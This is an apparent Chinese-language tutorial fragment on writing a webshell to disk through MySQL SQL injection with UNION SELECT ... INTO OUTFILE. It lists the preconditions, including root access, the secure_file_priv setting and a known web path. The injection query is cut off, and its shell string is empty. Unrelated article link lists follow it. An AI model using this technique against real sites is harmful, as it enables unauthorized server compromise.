0x00 利用条件

  • root权限
  • secure_file_priv=为空或者在网站根目录下(网站根目录为d:\www,secure_file_priv=d:\也可以)
  • 知道绝对路径
  • gpc关闭,这个应该是php的,会转义单引号,选择路径的时候一定需要单引号

0x01 查看secure_file_priv设置

show global variables like '%secure_file_priv%';

查询结果

  • 5.7.26为null,5.5.29为空

    这里为NULL

0x02 联合注入写shell

select * from users where id=-1 union select 1,2,'' into outfile 'D

最新文章

  1. Python中的dict和set
  2. React之Froms
  3. tableView优化性能
  4. Mathematics:Raising Modulo Numbers(POJ 1995)
  5. NYOJ之猴子吃桃问题
  6. Redis与Java - 实践
  7. JS教程:词法作用域和闭包 (网络资源)
  8. android WebView交互优化
  9. 转:Why SeaJS
  10. 查询显示MSSQL表结构 [转]
  11. git创建与合并分支
  12. Excel 自定义函数
  13. .Netcore之日志组件Log4net、Nlog性能比较
  14. 怎样将word文件转化为Latex文件:word-to-latex-2.56具体解释
  15. springMVC(7)---表单标签
  16. Pymongo一些常见需求(陆续补充)
  17. meta的用法
  18. MySQL集群架构:MHA+MySQL-PROXY+LVS实现MySQL集群架构高可用/高性能-技术流ken
  19. switch_case注意事项
  20. 【转】10 个很有用的 jQuery 弹出层提示插件

热门文章

  1. Android 之 手动创建活动
  2. Redis生产环境节点宕机问题报错及恢复排错
  3. C++并发与多线程学习笔记--单例设计模式、共享数据分析
  4. Linux常用命令-基础部分
  5. JS基础学习第三天
  6. Jenkins 实现Gitlab事件自动触发Jenkins构建及钉钉消息推送
  7. PBR(基于物理的渲染)学习笔记2
  8. postgresql高级应用之行转列&汇总求和
  9. 【原创】ansible-playbook 详解
  10. 路由器逆向分析------binwalk工具的安装